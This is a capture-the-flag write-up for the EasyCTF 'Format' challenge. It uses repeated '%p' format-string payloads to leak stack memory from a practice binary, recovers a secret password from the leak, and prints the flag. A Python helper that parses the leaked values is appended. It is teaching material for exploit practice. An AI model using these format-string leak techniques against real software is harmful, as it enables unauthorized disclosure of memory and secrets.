# EASYCTF - Format

With GDB, we set a breakpoint where the program compares the secret with our input:

`0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]`

We dump the contents of the stack through the format string:

Input (the payload is generated in the shell, then fed to the program from GDB):
```
python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f
(gdb) r < /tmp/f
```
Output:
```
0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f249000000000x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c8880x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x4007800x7ffce149c880(nil)(nil)
```

We look at the contents of `secret`, which lives at `$rbp-0x54`:

```
(gdb) x/ga $rbp-0x54
0x702570251013f249
```

The program compares against `eax`, a 32-bit register, so only the lowest 32 bits of the 8-byte value we read matter.
So the secret is: `1013f249`
We look for this value in the leak produced by the format string.
It is in the seventh `%p` value (the secret sits in the upper 32 bits of that 8-byte stack slot).

We do the same on the server:
```
user44798@shell:/problems/format$ ./format
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000

Enter your secret password (in hex)
732581c9
easyctf{p3sky_f0rm4t_s7uff}
```
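As an added example (not part of the original writeup), a small Python helper that splits the separator-less `%p` output into 64-bit stack slots and pulls the 4-byte secret out of the seventh one, using the two leaks shown above as constructed inputs. It assumes glibc's `%p` formatting (`(nil)` for NULL, `0x` plus hex digits without leading zeros), which is what makes the `0x` prefix an unambiguous boundary.

```python
import re

# Constructed inputs: the seven-%p run on the server and the first seven
# values of the GDB run, copied from the writeup above.
SERVER_LEAK = "0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000"
GDB_LEAK = "0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f24900000000"

# A value is either "(nil)" or "0x" followed by hex digits. The match is lazy
# and stops at the next "0x" / "(nil)" / end of string: since glibc never
# prints leading zeros, "0x" can only start a new value, so the split is unique.
TOKEN = re.compile(r"\(nil\)|0x[0-9a-f]+?(?=0x|\(nil\)|$)")


def split_leak(leak):
    """Split concatenated %p output into a list of ints (None for (nil))."""
    values = []
    for m in TOKEN.finditer(leak):
        tok = m.group(0)
        values.append(None if tok == "(nil)" else int(tok, 16))
    return values


def leaked_slot(leak, index):
    """Return the index-th (1-based) 8-byte stack slot as an int."""
    return split_leak(leak)[index - 1]


def slot_bytes(leak, index):
    """Render a slot as the little-endian bytes it occupies in memory.

    Useful to recognise leftover text in the leak: the first GDB slot
    decodes to b"Your nam", i.e. part of the program's own output buffer.
    """
    return leaked_slot(leak, index).to_bytes(8, "little")


def secret_from_leak(leak, slot=7):
    """Recover the 4-byte secret the way the writeup does.

    The program compares a dword at rbp-0x54 against eax; the %p covering
    that 8-byte stack slot (the seventh one in both runs) prints the secret
    in its upper 32 bits, formatted here as the hex string the prompt expects.
    """
    return "%08x" % (leaked_slot(leak, slot) >> 32)


if __name__ == "__main__":
    print(secret_from_leak(GDB_LEAK), secret_from_leak(SERVER_LEAK))
```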

Original writeup (https://ctfshellclub.github.io/2018/02/21/easyctf-Format-String/).